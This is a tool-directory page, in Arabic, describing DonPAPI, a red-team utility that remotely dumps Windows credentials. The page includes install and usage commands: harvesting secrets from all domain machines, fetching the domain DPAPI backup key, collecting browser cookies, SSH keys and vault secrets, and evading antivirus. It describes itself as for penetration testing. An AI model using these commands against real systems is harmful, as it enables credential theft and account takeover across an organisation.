Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DonPAPI — أداة تفريغ بيانات الاعتماد الآلي عن بُعد لبيئات ويندوز، تستخرج أسرار DPAPI وبيانات اعتماد المتصفحات والشهادات وملفات التهيئة، مع ميزات مدمجة لتجنب الدفاع ومشاهد الغنائم المستند إلى الويب. | Kitploit
أدوات/GitHubGitHub/login-securite/donpapi
كسر كلمات المرورجمع المعلوماتما بعد الاستغلالاختبار الاختراقالمصادقةالفريق الأحمر
GitHublogin-securite/donpapi

DonPAPI

أداة تفريغ بيانات الاعتماد الآلي عن بُعد لبيئات ويندوز، تستخرج أسرار DPAPI وبيانات اعتماد المتصفحات والشهادات وملفات التهيئة، مع ميزات مدمجة لتجنب الدفاع ومشاهد الغنائم المستند إلى الويب.

عرض المستودع
1.4k160منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

DonPAPI

تقوم DonPAPI بأتمتة تفريغ الأسرار عن بُعد على أجهزة Windows متعددة، مع مراعاة التخفي عن برامج الحماية.

DonPAPI Logo

البيانات المعتمدة التي يتم جمعها:

  • بيانات اعتماد متصفح Chromium وملفات تعريف الارتباط ورمز تحديث Chrome
  • شهادات Windows
  • مدير بيانات الاعتماد
  • بيانات اعتماد متصفح Firefox وملفات تعريف الارتباط
  • بيانات اعتماد Mobaxterm
  • بيانات اعتماد MRemoteNg
  • بيانات اعتماد RDC Manager
  • الملفات الموجودة على سطح المكتب ومجلد "الملفات الحديثة"
  • بيانات اعتماد SCCM
  • بيانات اعتماد الخزائن (Vaults)
  • بيانات اعتماد VNC
  • بيانات اعتماد Wi-Fi

لقد قدمنا محاضرة بالفرنسية حول DPAPI بعنوان DPAPI - Don't Put Administration Passwords In 🇫🇷:

  • الشرائح

جدول المحتويات

  • DonPAPI
    • التثبيت
    • بداية سريعة
    • الاستخدام
      • collect
        • المصادقة
        • الجمع
        • OPSEC
        • الاسترداد
        • الاستمرار في الجمع
      • gui
        • الواجهة الإلكترونية
        • الوظائف
    • إخلاء المسؤولية
    • الشكر

التثبيت

يجب تثبيت هذه الأداة باستخدام pipx أو في بيئة افتراضية مخصصة

root@kitploit:~
pipx install donpapi

أو (مع أحدث الإصدارات)

root@kitploit:~
pipx install git+https://github.com/login-securite/DonPAPI.git

أو (للتطوير)

root@kitploit:~
git clone git+https://github.com/login-securite/DonPAPI.git
cd DonPAPI
poetry update
poetry run DonPAPI

بداية سريعة

root@kitploit:~
pipx install donpapi
donpapi collect -u admin -p 'Password123!' -d domain.local -t ALL --fetch-pvk
donpapi gui

الاستخدام

root@kitploit:~
usage: DonPAPI [-h] [-v] [-o DIRNAME] {collect,gui} ...

Dump revelant information on compromised targets without AV detection. Version: 2.0.0

positional arguments:
  {collect,gui}         DonPAPI Action
    collect             Dump secrets on a target list
    gui                 Spawn a Flask webserver to crawl DonPAPI database

options:
  -h, --help            show this help message and exit
  -v                    Verbosity level (-v or -vv)
  -o DIRNAME, --output-directory DIRNAME
                        Output directory. Default is ~/.donpapi/loot/

collect

يُستخدم هذا الإجراء لجمع الأسرار من الأهداف المحددة في -t.

root@kitploit:~
usage: dpp collect [-h] [--keep-collecting seconds] [--threads Number of threads] [--no-config] [-t TARGET [TARGET ...]] [-d domain.local]
                   [-u username] [-p password] [-H LMHASH:NTHASH] [--no-pass] [-k] [--aesKey hex key] [--laps Administrator] [--dc-ip IP address]
                   [-r /home/user/.donpapi/recover/recover_1718281433] [-c COLLECTORS] [-nr] [--fetch-pvk] [--pvkfile PVKFILE]
                   [--pwdfile PWDFILE] [--ntfile NTFILE] [--mkfile MKFILE]

options:
  -h, --help            show this help message and exit
  --keep-collecting seconds
                        Rerun the attack against all targets after X seconds, X being the value
  --threads Number of threads
                        Number of threads (default: 50)
  --no-config           Do not load donpapi config file (~/.donpapi/donpapi.conf)

authentication:
  -t TARGET [TARGET ...], --target TARGET [TARGET ...]
                        the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, ALL to fetch every
                        computer hostnames from LDAP
  -d domain.local, --domain domain.local
                        Domain
  -u username, --username username
                        Username
  -p password, --password password
                        Password
  -H LMHASH:NTHASH, --hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  --no-pass             don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
                        credentials cannot be found, it will use the ones specified in the command line
  --aesKey hex key      AES key to use for Kerberos Authentication (1128 or 256 bits)
  --laps Administrator  use LAPS to request local admin password. The laps parameter value is the local admin account use to connect
  --dc-ip IP address    IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -r /home/user/.donpapi/recover/recover_1718281433, --recover-file /home/user/.donpapi/recover/recover_1718281433
                        The recover file path. If used, the other parameters will be ignored

attacks:
  -c COLLECTORS, --collectors COLLECTORS
                        Chromium, Certificates, CredMan, Files, Firefox, MobaXterm, MRemoteNG, RDCMan, SCCM, Vaults, VNC, Wifi, All (all
                        previous) (default: All)
  -nr, --no-remoteops   Disable Remote Ops operations (basically no Remote Registry operations, no DPAPI System Credentials)
  --fetch-pvk           Will automatically use domain backup key from database, and if not already dumped, will dump it on a domain controller
  --pvkfile PVKFILE     Pvk file with domain backup key
  --pwdfile PWDFILE     File containing username:password that will be used eventually to decrypt masterkeys
  --ntfile NTFILE       File containing username:nthash that will be used eventually to decrypt masterkeys
  --mkfile MKFILE       File containing {GUID}:SHA1 masterkeys mappings

المصادقة

تعمل المصادقة عن طريق تحديد نطاق باستخدام --domain، واسم مستخدم باستخدام --username، واختياريًا كلمة مرور باستخدام --password، أو تجزئة باستخدام --hashes، أو مفتاح AES باستخدام --aesKey، أو تذكرة Kerberos بصيغة ccache باستخدام -k (على نمط Impacket). يمكنك أيضًا المصادقة عبر LAPS على الجهاز باستخدام --laps وقيمة اسم حساب LAPS المحلي لهذه المعلمة.

الجمع

افتراضيًا، سيجمع DonPAPI ما يلي:

  • Chromium: بيانات اعتماد متصفح Chromium وملفات تعريف الارتباط ورمز تحديث Chrome
  • Certificates: شهادات Windows
  • CredMan: مدير بيانات الاعتماد
  • Firefox: بيانات اعتماد متصفح Firefox وملفات تعريف الارتباط
  • MobaXterm: بيانات اعتماد Mobaxterm
  • MRemoteNg: بيانات اعتماد MRemoteNg
  • RDCMan: بيانات اعتماد RDC Manager
  • Files: الملفات الموجودة على سطح المكتب ومجلد "الملفات الحديثة"
  • SCCM: بيانات اعتماد SCCM
  • Vaults: بيانات اعتماد الخزائن (Vaults)
  • VNC: بيانات اعتماد VNC
  • Wifi: بيانات اعتماد Wi-Fi
  • CloudCredentials: بيانات اعتماد السحابة
  • IDEProjects: ملفات مشاريع بيئات التطوير
  • PasswordManagers: ملفات مديري كلمات المرور
  • PowerShellHistory: ملفات سجل PowerShell
  • RecycleBin: ملفات سلة المحذوفات
  • SSHSecrets: ملفات أسرار SSH (المفاتيح)
  • VersionControlSystems: أدوات التحكم بالإصدارات (مثل git)

يمكنك تحديد كل ما تريد جمعه باستخدام --collectors (على نمط SharpHound). إذا استخدمت --fetch-pvk، سيقوم DonPAPI تلقائيًا بجلب مفتاح النسخ الاحتياطي للنطاق الخاص بمجال Active Directory واستخدامه لفك تشفير المفاتيح الرئيسية. بخلاف ذلك، يمكنك تقديم واحد باستخدام --pvkfile. يتم استخدام --pwdfile و --ntfile لتغذية DonPAPI بالأسرار من أجل فك قفل المفاتيح الرئيسية. ولكن إذا كان لديك مفاتيح رئيسية تم فك تشفيرها حديثًا، فيمكنك استخدام --mkfile.

[!WARNING] بعض طرق الجمع قد تتطلب تفريغ أسرار LSA (من أجل الحصول على مفتاح جهاز DPAPI). يمكن أن يكون هذا الإجراء مزعجًا، وستقوم أنظمة EDR الحديثة بحظرك فورًا. يمكنك استخدام -nr لتجنب القيام بهذه الإجراءات المزعجة، ولكن لن يتم جمع بعض الأسرار.

OPSEC

يدعم DonPAPI الآن ملف تكوين من أجل تحسين سلوك Secretsdump. سيكون هذا الملف موجودًا في ~/.donpapi/donpapi.conf، وافتراضيًا سيبدو هكذا:

root@kitploit:~
[secretsdump]
share = C$
remote_filepath = \Users\Default\AppData\Local\Temp
filename_regex = \d{4}-\d{4}-\d{4}-[0-9]{4}
file_extension = .log

الاسترداد

يدعم DonPAPI ملف الاسترداد. في كل مرة تقوم فيها بتشغيل أمر collect، سيقوم بحفظ ملف استرداد للأهداف المتبقية وجميع الخيارات. افتراضيًا، يكون الملف موجودًا في مجلد ~/.donpapi/register/.

الاستمرار في الجمع

أحيانًا أثناء التقييم الداخلي، قد ترغب في الضغط بقوة على بعض الأهداف المحددة وجمع الأسرار من أجهزة الكمبيوتر الخاصة بهم مرارًا وتكرارًا. لا تقم بعمل حلقة bash غبية، فقط استخدم --keep-collecting X، حيث X هي الثواني التي تريد الانتظار بين جلسات الجمع.

gui

الآن بعد أن جمعت كل هذه الأسرار، قد ترغب في تصفحها. يتيح لك DonPAPI التنقل عبر جميع الأسرار التي تم جمعها باستخدام واجهة ويب. لتشغيلها، استخدم donpapi gui.

root@kitploit:~
usage: DonPAPI gui [-h] [--bind BIND] [--port PORT] [--ssl] [--basic-auth user:password]

options:
  -h, --help            show this help message and exit
  --bind BIND           HTTP Server bind address (default=127.0.0.1)
  --port PORT           HTTP Server port (default=8088)
  --ssl                 Use an encrypted connection
  --basic-auth user:password
                        Set up a basic auth

الواجهة الإلكترونية

عام

تعرض هذه الشاشة كل كلمات المرور المعاد استخدامها من SAM عبر جميع أجهزة الكمبيوتر التي تم جمعها، بالإضافة إلى المهام المجدولة المفرغة وكلمات مرور حسابات الخدمة المفرغة من LSA. يمكنك تصديرها جميعًا بتنسيق CSV.

الأسرار

تعرض هذه الشاشة كل الأسرار التي تم نهبها باستخدام DonPAPI. يمكنك البحث في عناصر متعددة وتصدير الأسرار إلى CSV.

ملفات تعريف الارتباط (Cookies)

تعرض هذه الشاشة كل ملفات تعريف الارتباط التي تم نهبها باستخدام DonPAPI. يمكنك البحث في عناصر متعددة وتصدير ملفات تعريف الارتباط إلى CSV، وأيضًا نسخها ولصقها ككود JavaScript للصقه في متصفحك.

الشهادات

تعرض هذه الشاشة كل الشهادات التي تم نهبها باستخدام DonPAPI. يمكنك البحث في عناصر متعددة وتصدير الشهادات إلى CSV، وأيضًا إذا كانت الشهادة تسمح بمصادقة العميل، فإن النقر على نعم سيقوم بنسخ أمر Certipy لاستخدام الشهادة.

إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق الأخلاقي فقط. Login Sécurité غير مسؤولة عن الانتهاكات التي ترتكب باستخدام هذه الأداة.

الوظائف

واجهة المستخدم الأمامية مطورة باستخدام Vue3 + Vite.js، والخلفية هي Python Flask.

افتراضيًا، سيتم عرضها على http://127.0.0.1:8088، ولكن يمكنك عرضها بالطريقة التي تريدها، حتى على https://0.0.0.0:443.

[!WARNING] من فضلك لا تعرض DonPAPI لشبكة كاملة بهذه الطريقة، فقد يكون ذلك خطيرًا جدًا. يدعم DonPAPI HTTPS باستخدام --ssl ويمكنك إضافة مصادقة أساسية باستخدام --basic-auth. والأهم من ذلك، من فضلك لا تعرض DonPAPI على الإنترنت بهذه الطريقة.

النقر على أي قيمة في الجداول سينسخها فورًا إلى الحافظة.

يتوفر مربع اختيار إخفاء كلمة المرور في الواجهة، وذلك لإخفاء البيانات الحساسة في الواجهة، وهو مثالي لالتقاط لقطات الشاشة.

الشكر

كل الفضل يعود لهؤلاء الأشخاص الرائعين للقيام بالبحث والبرمجة الصعبة:

  • Benjamin Delpy لمعظم أبحاث DPAPI (دائمًا مشروحة بشكل رائع، <3 كودك)
  • كل الفريق العامل على Impacket (https://github.com/SecureAuthCorp/impacket). تقريبًا كل ما نقوم به هنا يأتي من Impacket.
  • Alesandro Z وكل من عمل على Lazagne (https://github.com/AlessandroZ/LaZagne/wiki) لوحدات VNC وFirefox، وعلى الأرجح للكثير من الوحدات الأخرى في المستقبل.
  • dirkjanm لفكرة واجهة المستخدم في Roadtools وكل بحث قام به على الإطلاق. لقد تعلمت الكثير في مواضيع كثيرة بفضلك. <3
  • Byt3bl33d3r لـ CrackMapExec وكل الفريق العامل على NetExec (الكثير من الإلهام والكود يأتي من مشاريع CME / NXC)
  • كل فريق Login Sécurité لأفكارهم ومساعدتهم في تصحيح أخطاء كودي السيئ (شكر خاص لـ @layno و @HackAndDo على ذلك)
تنزيل الأداة